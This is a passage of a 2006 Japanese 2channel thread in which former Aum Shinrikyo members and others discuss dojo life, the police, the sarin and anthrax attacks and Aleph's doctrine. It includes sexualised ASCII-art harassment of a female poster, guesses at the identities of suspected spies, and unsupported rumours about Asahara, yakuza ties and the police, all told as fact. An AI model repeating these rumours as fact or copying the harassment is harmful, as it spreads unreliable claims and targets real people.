それで、もういや、って切れたら、、しばらくすごいタマスになったんだと
思うけど
頭の回転がすっかり衰えて、何もわからない、隣の人が何をしゃべっているのか
わからない、すぐに忘れるってひどい状態
それで、仕事を続けていたんで、会社が怖くてならなかった時期があった

漏れはなんとかならないかと思って道場に繰るのに
メッタジは言ったよ 二人でいるときにね
私がメッタジの前で馬鹿笑いしたことがあってね
(笑わないで、バカが移るから、、)って得意そうにいって
仕事していたよ
あの人は、仕事ばかりして、私の悩みがなんなのか、ちっとも気にしていなかった
何か悩みがあるから、宗教団体に着たのに、そういうことがわかんないんだな
現世的な奴だと思ったね
まあ、極初期のことよ
後では、進歩でもしたのか、親切になったけどよ
仕事ができるのを鼻にかけてみえたね


855 :阿左谷北:2006/08/27(日) 14:22:46 ID:UfKECvHi
>>852
メッタジ強いんだ!見たことないのが残念。
てか、キャンディさんの話で始めて知った名前です。

856 :名無しさん@3周年:2006/08/27(日) 14:26:00 ID:EvK9loon
そのころのメンバーてのが(真面目そうに見えた)
しらないけさ、なんか、人の気持ちとか、疎そうな奴らなんだよね
人間的には冷たい感じがした

たとえば、恋愛について悩みがあるとか、そういうのを聞いて時間を割くとか
無駄だって、考えるの
まあ、悟りには無駄だけど、こっちにはこっちの考えがあってくるんだから
金取っているんだし、少し考えてくれたらいいと思うんだけど

そんで今更、(その二人がってわけじゃないけど)出家しているのに
恋人がいるだの、下向すると待ってましたといわんばかりに彼女作るのとか
なんとかせよ

857 :名無しさん@3周年:2006/08/27(日) 14:28:39 ID:Jj22x4Uy
>>853
> こんな不穏な教団の動きを警察が事前に察知出来なかったのもヤバクない?

やば過ぎるよ。
知ってたとしても、毒ガスを撒かれてから動いている様では遅すぎる。
公安のスパイが本当に居たのかどうかは知らないけど、チクッていた奴は
居ただろうに。

858 :名無しさん@3周年:2006/08/27(日) 14:29:19 ID:EvK9loon
そのころのメンバーてのが(真面目そうに見えた)
メッタジやメーカラダイカだったんだわ
修羅ばかりだろ? んで、カーテンの向こうで金もってこいとか
ほざいているし、、
みんな、点数稼ぎして痛んだと思う
今思うとね

859 :阿左谷北:2006/08/27(日) 14:31:20 ID:UfKECvHi
キャンディさんは学生時代彼氏いたと。
でも他に好きな人ができたと。
そう言うことなんですか?
好きな人と結ばれないキャンディさんと
彼氏と週末エッチに励むキャンディさんが
同時進行していたということでしょうか?

860 :名無しさん@3周年:2006/08/27(日) 14:32:19 ID:EvK9loon
> こんな不穏な教団の動きを警察が事前に察知出来なかったのもヤバクない?

教団の連中は、警察を目の敵にしているんだよ
警察をバカにしているのに、何かあると、警察が動かないとかなじるのはおかしい
てか、警察があったから、事件が小さくて済んだと、漏れは逆に感謝しているよ
いまだに、公安公安って言う奴がいるけど、


861 :名無しさん@3周年:2006/08/27(日) 14:35:01 ID:EvK9loon
好きな人と結ばれないキャンディさんと
彼氏と週末エッチに励むキャンディさんが
同時進行していたということでしょうか

するどいね、でも、別れたよ 漏れは同時に二人好きになれないの
教祖と違うからね

862 :名無しさん@3周年:2006/08/27(日) 14:35:55 ID:c/SRePe+
> 好きな人と結ばれないキャンディさんと
> 彼氏と週末エッチに励むキャンディさんが
> 同時進行していたということでしょうか?

ドタマスの原因はコレなのでは?ぷっ

863 :名無しさん@3周年:2006/08/27(日) 14:37:25 ID:eDKuIJxc
ココでキャンディの書き込みをよく読むようになってバカが移りましたが何か?

864 :名無しさん@3周年:2006/08/27(日) 14:38:10 ID:EvK9loon
よく読んでないけど、中川の話だと、警察は彼の行動を把握していたって
ことじゃなかったっけ?
なんで、わかっていたならもっと早く止めてくれなかったんだ、みたいな(笑、勝手な奴)
こと言っていたよね

ある程度わかっていたから、サリン事件の当日にはもう
オウムがやったんじゃないか、って噂が飛んでいたんだよねえ
何もしらなかったら、当日にそんな話でないでしょう

865 :名無しさん@3周年:2006/08/27(日) 14:41:29 ID:EvK9loon
てさ、実行犯が逮捕されたあとの、サリンプラント一つとっても
自分たちで片付けろ、とか言われたらどうする?

人の手を煩わせておいて、現世の人間はどうだとか、恥ずかしすぎるよ

866 :阿左谷北:2006/08/27(日) 14:43:55 ID:UfKECvHi
俺は20くらいの一番美しい時期に
彼氏がいて、エッチできたキャンディさんを
素晴らしいと思いますよ。
俺はそんな機会も何もなかったから。
だから、色々と聞いてしまう。どんなに楽しいのだろうかと。
女性の立場でエッチを赤裸々に語れるのは
キャンディさんしかいないと思うからね、

867 :名無しさん@3周年:2006/08/27(日) 15:00:28 ID:gSK8Osay
>>866
>俺はそんな機会も何もなかったから。

いいじゃないか。
キミにはラジオを9kHzごとwatchしていたとゆう電脳的な青春物語があるのだからw

868 :阿左谷北:2006/08/27(日) 15:02:30 ID:UfKECvHi
俺、観念崩壊セミナー出たんだけど。
その時、自分の破戒を発表する場面があって
ある30歳くらいのサマナが
ぼんぷと邪淫の関係になってしまいました。と、
明るく、みんなの前で告白したんだよ。
俺は、もの凄い憤りを覚えた。何故、破戒して、誇らしげに発表するんだ?
こいつは魔女か?と
しかも、回りのサマナも人事のように聞いていた!

今思い出しても、気味が悪い。

869 :阿左谷北:2006/08/27(日) 15:06:22 ID:UfKECvHi
しかも女性だった!
すごい嬉しそうに、語っていた!
空気読めてねえのも、程があるょ。

870 :名無しさん@3周年:2006/08/27(日) 15:12:29 ID:p0WOlPWd
>ぼんぷと邪淫の関係になってしまいました。と、
>明るく、みんなの前で告白したんだよ。

これって出家前の話でしょ?
出家後だったら、こんなの直ぐに破門にせーよ

871 :阿左谷北:2006/08/27(日) 15:14:02 ID:UfKECvHi
でも、まてよ?
あれは、他のサマナの破戒を引き出すための
おとりだったのかも知れぬ。
何故なら周囲の師が怒らなかったから。
ぼんぷと邪淫なんて!しかも女性サマナが堂々としてたのは
余りにも不自然だった。

872 :名無しさん@3周年:2006/08/27(日) 15:15:11 ID:M8QylpeJ
オウムは(も)、バカ女が多すぎ。

873 :名無しさん@3周年:2006/08/27(日) 15:17:07 ID:Xs7vRni1
>>854
キチガイ

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 

874 :名無しさん@3周年:2006/08/27(日) 15:18:11 ID:Xs7vRni1

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \  教祖様ーーーーーーー!!!!!
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


きんもーーーーっ★


875 :名無しさん@3周年:2006/08/27(日) 15:20:00 ID:UfKECvHi
>>870
外の仕事で知り合ったみたいなこと言ってた。
出家か在家かは謎。

でも、在家時代なら邪淫って程でもないでしょ?
既婚者なら別だけと。

876 :名無しさん@3周年:2006/08/27(日) 15:25:00 ID:dC7TFvjv
>外の仕事で知り合ったみたいなこと言ってた。
>出家か在家かは謎。

そのオサセがまだ教団に居るのなら、直ぐに戻る
って、もう40過ぎのおばさんだた

877 :名無しさん@3周年:2006/08/27(日) 15:35:19 ID:7z1fqfo9
>俺は、もの凄い憤りを覚えた。何故、破戒して、誇らしげに発表するんだ?
>こいつは魔女か?と

かなりインパクトある告白と見た

>何故なら周囲の師が怒らなかったから。

師も引いてたんじゃないのか?w

878 :阿左谷北:2006/08/27(日) 15:49:34 ID:UfKECvHi
今の俺なら、憤りもしないが、当時はまだサマナは清らかだと
思っていたので。

879 :名無しさん@3周年:2006/08/27(日) 16:53:31 ID:E/Y8TKj5
俺はアーカシックレコードに興味があるな。
ヨーガによってそこにアクセスできるようになる保障があるなら
修行してやらんこともないYO

880 :名無しさん@3周年:2006/08/27(日) 17:04:23 ID:Ltlel/Qd
ある、あんまり宛てにならないような性格の元サの男に聞いたんだけど
古い奴だけどさ

みんなで懺悔したことがあるんだって、
そしたら、ある人が、実は堕胎したことがあるっていったのかな
そしたら、せきを切ったように(笑)出るわ出るわ 打ち明け話
、、
で、あんまりなんで 話題変えましょう(笑)って

881 :名無しさん@3周年:2006/08/27(日) 17:09:54 ID:Ltlel/Qd
そういえば、事件後に警察の人と合って話したことがあるんだけど
(呼び出された)
あなたはアサハラに呼ばれたことがあるか、と
いいえ、私は在家なんで、滅多に会えませんからといったが
(注意したほうが、いい、実はアサハラは女性の陰毛を集めるのが趣味でしてね、、)とさ

漏れは、そのサツにあったとき、スヴァジがグラグラと動くのを感じた
これはひどくスケベなオヤジだと、思ったら、そんな話を切り出しやがったので
ああ、当たったなと

そのサツはテレビ出てしゃべってましたね 割と綺麗な顔の髪の毛の黒々した
中年の人だった
教祖は、集めた女性の陰毛を、一本一本ビンに入れて、保管してあると
私に語ったんだよ、、、
教祖、そんな趣味はないよなあ?わからんけど、、
そんな話をするから、警察は信用できないって、いまだに思われているんだよ

そのサツは、テレビで(サクラーってすごく綺麗なんですよ)って
仕事忘れた顔して言ってましたね
一瞬ね

882 :名無しさん@3周年:2006/08/27(日) 17:16:37 ID:E/Y8TKj5
真我とは純粋で清らかである。そのため不浄なものを嫌っている。
だはあなたも含め誰一人そのことに気付いてないのが現状だ。
よって次の瞑想が必要になる。

「わが身これ不浄なり」

883 :阿左谷北:2006/08/27(日) 17:25:43 ID:UfKECvHi
警察の人はエロイ人多いよ。
人のことあれこれ聞く仕事だから
エロイ性分じゃないとやってられないだろうね。
最近多いでしょ?警察のエロ事件。

884 :阿左谷北:2006/08/27(日) 17:39:25 ID:UfKECvHi
オウムなんて、どうせ止めるんだったら
犯罪しないで、破戒しまくった奴勝ちだな。
みんな溜まってるから、アタックすれば、俺もいいことできたかもな。

885 :名無しさん@3周年:2006/08/27(日) 18:07:27 ID:uVzhpITj
麻原が女性サマナの陰毛を集めていたのは事実だよ。有名なこと。

886 :名無しさん@3周年:2006/08/27(日) 18:41:03 ID:MgJg/wQw
もしあなた方がね、人から嫌悪されたら、憎まれたら
どんな気持ちになるかということを考えてごらんなさい。
あなた方は自分にとって都合のわるいものを憎み、
都合のいいものだけを愛します。しかしね、それは
本当の愛ではないのです。平等心でもないのです。
ましてや教団で教えた四無量心とはまったく違うのです。
憎むというのは大体が悪魔の心なんです。いいですか、
あなた方がね、本当にアーレフの教義を身につけたのならば、こんな所で
悪口ばっかり書いているわけがないんですよ。



887 :名無しさん@3周年:2006/08/27(日) 19:03:26 ID:+C8nLuHm
信者っていつも何やってんの・

888 :名無しさん@3周年:2006/08/27(日) 19:09:28 ID:MCOCXX9u
「拙速裁判」と懸念の声 松本被告弁護団が集会 [ 08月27日 18時42分 ]
共同通信


 最高裁に特別抗告中のオウム真理教松本智津夫被告(51)=教祖名麻原彰晃、
1審死刑=の弁護団主催で、松本被告の裁判などをテーマにした公開討論会が27日、
東京都内で開かれ、裁判の進め方を「拙速」と指摘して懸念する声などが上がった。
 集会には約70人が参加し、講演した日刊ゲンダイ編集部長の二木啓孝さんは
「松本被告を『早く縛り首にしろ』という世論があるが、裁判は歴史の記録。
罪を被告に自覚させるためにも情緒的な議論に流れず、きちんとやるべきだ」と主張。
 ジャーナリストの斎藤貴男さんは東京高裁が弁護側の控訴趣意書提出を待たず、
決定で控訴を棄却したことについて「裁判所が絶対権力であり、弁護団が何を言おうが、
それ以外の価値観は認めないという印象だ」と批判した。
ttp://www.excite.co.jp/News/society/20060827184254/Kyodo_20060827a411010s20060827184254.html

889 :名無しさん@3周年:2006/08/27(日) 19:12:16 ID:Ltlel/Qd
四無量心があったら、信者から金むしって
相手が泣こうがわめこうがむしって
細菌とか毒がス研究するんですよ

でヘリコプタ買って上空から撒くとか
ああ、慈愛の雨、、ほんと、ばからしい


890 :名無しさん@3周年:2006/08/27(日) 19:22:21 ID:Ltlel/Qd
>罪を被告に自覚させるためにも情緒的な議論に流れず、きちんとやるべきだ」
と主張

教祖に極刑ってのが、情緒的な判断だろうか?
なぜ、死んだ人はあっと言う間に死んだのに、
殺したほうが、あれやこれやで命が長引くのだろう
金で買われてそんなことほざいているんじゃないのかね?

第一、治療したら直る、という保証でもあるのか
だいたいが、同じ長い期間拘留されている弟子ですら、頭がおかしくなど
なっていないのに! 人より精神性が高いはずのグルが、なんであんなバカになるものか
自演だよ

それに、現役でぴんぴんしていたころだって、口を開けばウソばっかり言っていたのに
治療してやったところで、本当のことを言うのかね?
まあ、治療すれば、本当のことをいうのなら、すればいいと思うけど
いつまでもだんまりして、(この俺様が死んだら、お前ら何も真実がわからないまま
終わってしまうよな?じゃあ、生かしておくよな、、、)と
ずるい立ち回りだろ?
とにかくずるい奴なんだから!  


891 :名無しさん@3周年:2006/08/27(日) 19:24:51 ID:Ltlel/Qd
もし、本当のことを言ったら、命だけは助けてやる、といったら
しゃべりそうだよな?


892 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 19:27:10 ID:MgFIWbz7
亀レスごめんね
>>623
>宮下さんは、新宿怖くないんですか?

渋谷とかよりは、恐くないと思う
あそこは、チーマーとかいうトウシロ連中が居るしね

>ヤクザの縄張りとかもあるんじゃないですか?
新宿歌舞伎町は、あの狭い地域に200以上の組織が対峙しています
で、、昔は小金井一家のシマでしたが、今は基本的に住吉が納めています
その筋の方は一般の人には絶対に手は出しませんので、かえって安心です
渋谷・六本木にもその筋の方は勿論居ますけど、私は新宿の方が治安維持は良いと思う
アーレフのA派の連中は一般人の個人情報を抜いたり、嫌がらせをしたりしますよね
少しは、ヤクザさんを見習って欲しい

893 :名無しさん@3周年:2006/08/27(日) 19:27:37 ID:tQYHCEj0
>>886

あなた方アーレフは都合のいいことだけ言い、都合の悪いものには蓋をしようとします。
それは本当の愛ではないのです。平等心でもないのです。
事実をちゃんと捉えることなく歪んだものの見方をする、これは悪魔の心なんです。
いいですか?
本当に四無量心を身につけているならばこんなとこで言い訳ばっかりを書いてる訳がないんですよ。

894 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 19:31:46 ID:MgFIWbz7
>警察の人はエロイ人多いよ。

私の店にも警視クラスの人や、警官の人は良く来るよ
お客さんは全然解らないけど、私達には直ぐに、ヤクザさんと警察は解る
ママは隠しているけどね(*^-^*)

この前は、警視正の方が来ましたよ(^.-) -☆
とっても紳士でした
確かにエロい警官の人も居るけど、普通はみんな良い人だよ
ハッキリ言って、A派の連中よりは霊性も人間性も上で徳もあると思う
A派の連中は何てったって自分だけの為に解脱を目指しているけど
警官は我々市民を身体を張って守ってくれてるんだからね

895 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 19:34:18 ID:MgFIWbz7
>あなた方がね、本当にアーレフの教義を身につけたのならば、こんな所で
>悪口ばっかり書いているわけがないんですよ。

おかしいな?
本当に教義を実践するなら徳を消耗する2ちゃんなんて見ないはずだよね?
それとも、あなたは大乗の就業者だってかε- (ー ^ ) ぷっ
言っている事が矛盾だらけだよ

896 :名無しさん@3周年:2006/08/27(日) 19:49:49 ID:llt5ioo2
今日の東京道場のイベントの報告がなされていないということは
残念ながらスパイ君は本当に摘発されてしまったのだろう。
石○龍太か○坂康次のどちらが最初に血祭りになったのか?
それとも同時か?道場の下した処分は?

897 :名無しさん@3周年:2006/08/27(日) 19:51:19 ID:MgJg/wQw
いいですか、もし、あなた方が指摘するような悪徳があなた方の「想像」の中に
のみ存在し、悪口を言われている人達(教祖やサマナ)の中に実際には無い場合−−−
残念ながらこれがほぼ実状なのですが−−−邪悪なカルマを力の及ぶ限り、
自己に作りだしているということを忘れないでください。


898 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 19:56:49 ID:MgFIWbz7
>石○●●か○●●次のどちらが最初に血祭りになったのか?

アーレフが俗に言う「S」は、死ぬほど居るし、師にもスパイは居ます
このヘンは安心してね
ただ、上記の要に一文字伏せ字では、完全に個人特定可能です
当然、サイバーポリスの取り締まり対象に該当してしまいますので注意してね
みんな仲良く楽しくスレ使おうよ

899 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 20:00:29 ID:MgFIWbz7
>あなた方が指摘するような悪徳があなた方の「想像」の中に
>のみ存在し、悪口を言われている人達(教祖やサマナ)の中に実際には無い場合−−−
>残念ながらこれがほぼ実状なのですが−−−

悪いね・・・ これは証明出来るよ
なんなら、昔みたいに道場内の事を暴露してもいいけどね(^.-) -☆
あなたが信徒かサマナか知らないけど
アーレフの負の部分を見ていないだけだと思う
特にA派がどれだけ汚い事をしているか・・・・
現実に目をそむけてはダメですよ

900 :名無しさん@3周年:2006/08/27(日) 20:01:11 ID:tQYHCEj0
>>897

いいですか、あなたの指摘する「想像」が実際には「現実」として存在し、
悪口を言われている人達(教祖やサマナ)の犯したものであると正知する・・・
そうでないといつまでも迷妄に捉われたままだということを忘れないでください。


901 :和井 恵:2006/08/27(日) 20:01:59 ID:HdIJ+5N3
>>886
>もしあなた方がね、人から嫌悪されたら、憎まれたら
>どんな気持ちになるかということを考えてごらんなさい。

その前に、何故君たちが「人から嫌悪され、憎まれる」のか、
その理由を謙虚に、そしてしっかりと認識すべきだね。
そして、それに対する「慚愧の心」が生まれない限り、
このような思わせぶりな「説法もどき」の発言は、
まったく意味が無く、相手に伝わることは永遠に無いだろう。

>あなた方は自分にとって都合のわるいものを憎み、
>都合のいいものだけを愛します。

それを他人に言う前に、鏡の前に立ち、
鏡に映った「自分自身」に向かって、
同じ言葉を伝えるべきだね。
君たちはそれを決してしようとはしない。

>あなた方がね、本当にアーレフの教義を身につけたのならば、

私は、「そのようなモノ」を身に付けたいとは思わない。
それを身に付けると、「今の君たち」のようになるのだろうから…

902 :宮下杏菜 ◆kRToreiII. :2006/08/27(日) 20:02:15 ID:MgFIWbz7
>>900 禿同
やっば、みんな文章上手いねー
パチパチパチ\(^o^)/

903 :名無しさん@3周年:2006/08/27(日) 20:03:53 ID:Ltlel/Qd
897
そんなこと注意されるいわれはないさ
教祖も、まだ来てもいないハルマゲドンについて事細かに語って
まわりを恐怖させ、自分に都合よく動かしたんだから

そのハルマゲドンが実際には無い場合、、、残念ながらこれがほぼ実情なのですが、
邪悪なカルマを力の及ぶ限り、
自己に作り出しているということを忘れないでくださいな
いまだに教祖の名前で金集めてメシくっている
厚顔無恥な連中にもね!

904 :名無しさん@3周年:2006/08/27(日) 20:13:17 ID:Ltlel/Qd
897
警察の操作には多少の間違いがあるかもしれない
マスコミの報道にも間違いがあるかもしれない
しかし、彼らは間違ったら間違ったで、シブシブでも後から訂正を
したりする

あんたらは、間違っていようが、信教の自由をたてにいつまでも
間違いが鼻面の前に突き出されても、認めようともしないんだよ
あんたの顔にケリをいれてやりたいね
いつまで善人面しているんだよ
いい気になりやがって

905 :和井 恵:2006/08/27(日) 20:15:57 ID:HdIJ+5N3
>>882
>真我とは純粋で清らかである。

貴方はその事実を、どうやって知ったのですか?

>そのため不浄なものを嫌っている。

真我は、本質的に「不浄に対する嫌悪」を持っている、と。

>だはあなたも含め誰一人そのことに気付いてないのが現状だ。

それに気付いているのは、貴方だけなのですね。

>よって次の瞑想が必要になる。
>「わが身これ不浄なり」

「四念処(身・受・心・法の四つの部分への気付き)の瞑想」。
その最初にくる「身」に対しては、三種類の「観想法」がある。

1)「それは不浄である」
2)「それは浄でも不浄でもない」
3)「それは清浄である」

これらは、特にどれが良いというものではなく、
その人の「心の状態(何に囚われているか)」によって
「選択(択法覚支)」されるのです。

906 :名無しさん@3周年:2006/08/27(日) 20:19:00 ID:Ltlel/Qd
オウムがメーソンに襲われたという目撃情報があるのか?
教祖は襲われた襲われた、と口先でいって、実は弟子に細菌を作らせ
撒かせていたじゃないか
それは実行犯がはいている
そのせいで、同じ仲間同士なのに、最近をまいて、メーソンにやられていると
ウソの策略をして、弟子を陥れる側と
何も知らずにひっかかって、(メーソンに本当に襲われた)と妄想狂のクマのように
吼える奴と、弟子すら二つに割れたんだぜ、、
何食わぬ顔で、あーしたらどうだ、こーしたら成功するか、と
人の命まで危険にさらして、実験したりする悪魔のような男だよ
そんな男をかばって、あんたも同罪だよ

907 :名無しさん@3周年:2006/08/27(日) 20:22:20 ID:Ltlel/Qd
たとえば、今でも教祖を拝んでいる奴は
サリンはオウムがやったんじゃないと、なんでか、私はこの目でみたわけじゃないと
じゃあ、同じ理論で
メーソンが教団を襲ったのをあんたは見たのか?
メーソンのどこの支部のなんという名前のどんな奴だ?
(これは私自身がそうだったので、情けないが)
教祖のいったことなら、全く疑わずに信じるから、証拠もないのに
メーソンに襲われると大騒ぎ
で、どうしたの?

908 :名無しさん@3周年:2006/08/27(日) 20:27:30 ID:Ltlel/Qd
>教祖のいったことなら、全く疑わずに信じるから、証拠もないのに
メーソンに襲われると大騒ぎ

で、その証拠(メーソンに実際襲われているという証拠)を作るために
早川あたりにいって、炭素菌まかせたりしたわけだろ?
しかも、炭素菌プロジェクトはたしかジョウユウが監督したそうだけど
じょうゆうは、炭素菌はたいした害のあるものでなかったと、
早川は、あれは科学班が失敗してたいしたものが作れなかったんだろうと


>じょうゆうは、炭素菌はたいした害のあるものでなかったと
これは、公式ホムペで質問に答えて言い分けしていた
つまり、死人がでなかったし、害もなかった、臭かっただけ
だからいいじゃんと、そういうこと




909 :名無しさん@3周年:2006/08/27(日) 20:29:39 ID:FEvK/onC
> メーソンが教団を襲ったのをあんたは見たのか?

村井事件は?


910 :和井 恵:2006/08/27(日) 20:30:22 ID:HdIJ+5N3
>>897
>いいですか、もし、

「もし(if)」、仮に〜であると仮定するならば、
書きからは「仮定」された話の内容となる。

>あなた方が指摘するような悪徳が
>あなた方の「想像」の中にのみ存在し、
>悪口を言われている人達(教祖やサマナ)の中に
>実際には無い場合−−−

ここまでが「仮りに定めた条件の説明」の部分。

>残念ながらこれがほぼ実状なのですが−−−

突然、話を「仮定」から「真実である」にすり替える。
この手法は、教団側がよく使う「詭弁術」。
つまり、何の説明(証明)も出来ないくせに、
その「一方的な主張(思い込み)」を、それがあたかも
「真実」であるかのように相手に押しつけるテクニック。

>邪悪なカルマを力の及ぶ限り、
>自己に作りだしているということを忘れないでください。

この部分は、もう「無視」していいでしょうね。
ワンパターンだから…

911 :和井 恵:2006/08/27(日) 20:32:32 ID:HdIJ+5N3
 × → 書きからは「仮定」された話の内容となる。
 ○ → 下記からは

912 :名無しさん@3周年:2006/08/27(日) 20:34:05 ID:1Qh2hdiP
柴田恭平が死んだってほんとうかよ?
http://024.gamushara.net/imgview.php?board=smile&file=1156663073669d51c.jpg
誰か柴田恭平のバルドー見てくれ。

913 :名無しさん@3周年:2006/08/27(日) 20:44:11 ID:UhdbI4FL ?2BP(0)
和井さんに質問です。

ワラの束の話を比喩に使われましたね?
和井さんの「縁起の法」についての見解は、
「二つのワラ束が人形に寄り添って立っている状態」、
つまり、どちらがどちらの方向にどう力が働いて
この状態が成立しているのか、という分析(現状に限定)であって、
どうしてこのような形でワラ束が置かれているのか、
誰かが持ってきたんだろうか、とか
そういう分析(経緯を問う)ではないのだ、ということですね?

914 :名無しさん@3周年:2006/08/27(日) 21:08:36 ID:Ltlel/Qd
確かに村井は殺されたわね
で、あたしは江川さんじゃないんで、女の身であまり
事件に首突っ込むのは危険だと思うんだけど、
村井は教団の資産が1000万あるとか豪語したそうだけど
殺されて、しゃべれなくされた
で、お金はどこいったの、という話がある
どうも暴力団に流れたとか、よくわからんが、
よくわかられてはまずい勢力があるんでしょう
もうオウムは規模が小さくなったから、ワルもできないんだろうけど
オウムとつながって利益を得ていた団体があるなら
そこもオウムを突付くと困るんだろうから

915 :名無しさん@3周年:2006/08/27(日) 21:11:13 ID:Ltlel/Qd
こういうことを熱心に調べると
命の危険があると、お馬さんは思いますか
私よりずっと詳しいでしょう?

916 :和井 恵:2006/08/27(日) 21:15:08 ID:HdIJ+5N3
>>913
>和井さんの「縁起の法」についての見解は、
>「二つのワラ束が人形に寄り添って立っている状態」、
>つまり、どちらがどちらの方向にどう力が働いて
>この状態が成立しているのか、という分析(現状に限定)であって、

「どちらがどちらの方向にどう力が働いて」
そこまで細かく考えなくても良いのです。
つまり、「二つの構成要素」は、
それ自体(単独)では生起し続けることができない。
二つが揃(そろ)って「互いを支え合う」ことによって、
初めて「存在することが出来る」ということ。

「無明」というものは「貪り・怒り・無知」という
三つの構成要素によって支えられている。
つまり、これらのうちのどれか一つを「取り外す」だけで、
「無明」は存在することが出来なくなってしまうのです。
ただ、「三毒」は連動しているので、
「貪り(渇愛)」を取り外すためには、
ある程度「怒り」や「無知」の働きも弱めた方が
「外しやすい」のですけどね。

>どうしてこのような形でワラ束が置かれているのか、
>誰かが持ってきたんだろうか、とか
>そういう分析(経緯を問う)ではないのだ、ということですね?

それは関係ないですね^^

917 :名無しさん@3周年:2006/08/27(日) 21:15:14 ID:Ltlel/Qd
で、どうしても本の名前が思い出せないんだけど
何とか工業の社長が教祖に会社つぶされたあとに、書いた暴露本の中で
その小説は一応小説の形態をとっていたんで全部が本当かわからないんだけど
教祖が、ヤクザに金を渡しているのを目撃したって、
そいつは書いていたんだよね

文庫本サイズで、、小説オウム真理教サリン事件とか、そんな名前じゃなかったかな
教祖が社長になるし、自分のところの社員は、強制的に信者になってもらう
嫌なら会社をやめろ、って言わされて
結果つぶされて、、と書いていた

918 :名無しさん@3周年:2006/08/27(日) 21:20:12 ID:5TIKFS20
> 文庫本サイズで、、小説オウム真理教サリン事件とか、そんな名前じゃなかったかな

オウムを喰おうとした男 ― 小説 O鉄工事件
大下 英治 (著)/徳間文庫
http://www.amazon.co.jp/exec/obidos/ASIN/4198906335/qid=1156681086/sr=1-1/ref=sr_1_0_1/250-7716455-5942636>>917

919 :和井 恵:2006/08/27(日) 21:30:37 ID:HdIJ+5N3
>三つの構成要素によって支えられている。

つまり、「二つのワラ束」ではなくて、
「三つのワラ束」が、互いを支え合っている状態を
イメージしてみて下さい。

これら三つが支え合うことによって生起しているのが
「無明」とよばれる状態なのです。
そのうちの一つを取り外すと、
残りの二本も「バランスを失って」倒れてしまうでしょ?

だから、初期のアーガマでは、
「渇愛を滅することが、苦の滅尽である」
というような表現もされているわけ。

だから、三つの「択法覚支(セレクション)」

「怒り」に焦点を当てたアプローチの仕方。
「貪り」に焦点を当てたアプローチの仕方。
「無知」に焦点を当てたアプローチの仕方。

これらを、その人の特質(タイプ)に合わせて選び出し、
うちの「どれか一つを実践する」といいでしょうね。

920 :名無しさん@3周年:2006/08/27(日) 21:32:51 ID:Xs7vRni1
ID:Ltlel/Qd

                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | 漏れ キャンディ
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \  教祖様ーーーーーーー!!!!!
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


きんもーーーーっ★


921 :名無しさん@3周年:2006/08/27(日) 21:33:00 ID:EMqXaDpt
○原鉄工 
社長 : ○原

ヴァジラ・アヌッタラ・ヒタ・アビヴッティ精密機器工業
社長 : 麻原

※「ヴァジラ・アヌッタラ・ヒタ・アビヴッティ」とは、「完全なる繁栄」という意味のサンスクリット語

922 :名無しさん@3周年:2006/08/27(日) 21:44:25 ID:Ltlel/Qd
918
情報もっていたんですね それだと思います
奥さんとよく、在家のくせに教祖に呼ばれて行動をともにしたと、書いていました
金持っていたから、狙われたか、したんでしょう
その人、かぎまわるクセがあったらしくて、、見てしまったと

書いてあることが本当なら、あるとき、暴力団が道場に来たんだって
それで、サマなが怖がっていると、
教祖が部屋にそいつを呼んで、サマ何は全員下がれと、、
で、ケイマに命じて金をもってこさせて、(これで勘弁してくれ
私の立場も考えて欲しい)といったとか、
